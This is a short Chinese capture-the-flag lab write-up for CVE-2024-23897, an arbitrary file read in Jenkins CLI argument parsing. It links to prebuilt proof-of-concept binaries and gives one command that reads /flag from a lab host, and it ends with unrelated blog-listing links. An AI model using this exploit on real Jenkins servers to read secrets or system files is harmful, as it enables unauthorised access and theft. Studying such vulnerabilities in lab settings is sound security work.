【春秋云境】CVE-2024-23897-Jenkins 2.441之前版本存在任意文件读取漏洞

一、靶场介绍

Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中'@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。

二、POC下载

.直接下载编译好的二进制文件
Linux:

https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_linux_amd64.zip
Window:

https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip
其他系统Release:

https://github.com/wjlin0/CVE-2024-23897/releases/tag/v1.0.1

获取flag

CVE-2024-23897.exe -u http://39.106.48.123:41922/ -a /flag

相关推荐
wanhengidc19 小时前
巨椰云手机引领未来
运维·服务器·网络·游戏·智能手机
wanhengidc19 小时前
云手机的真实体验感怎么样
运维·服务器·安全·游戏·智能手机
脏脏a19 小时前
【Linux】Linux工具漫谈:yum 与 vim,高效操作的 “左膀右臂”
linux·运维·服务器
悟能不能悟20 小时前
dcpatchscan.exe这是什么
运维·服务器
wanhengidc20 小时前
云手机 流畅运行
运维·服务器·安全·游戏·智能手机
云飞云共享云桌面20 小时前
广东某模具制造工厂用一台云服务器供8个研发设计同时用
linux·运维·服务器·网络·自动化·制造
大博士.J21 小时前
手机端-adb脚本自动化-真机版
运维·智能手机·自动化
q150803962251 天前
告别复制粘贴!自动化处理文本空行的新思路
运维·自动化
dessler1 天前
Elasticsearch(ES)分片(Shard)和 副本分片(Replica Shard)
linux·运维·elasticsearch
Dovis(誓平步青云)1 天前
《探秘 Linux 进程控制:驾驭系统运行的核心之力》
linux·运维·服务器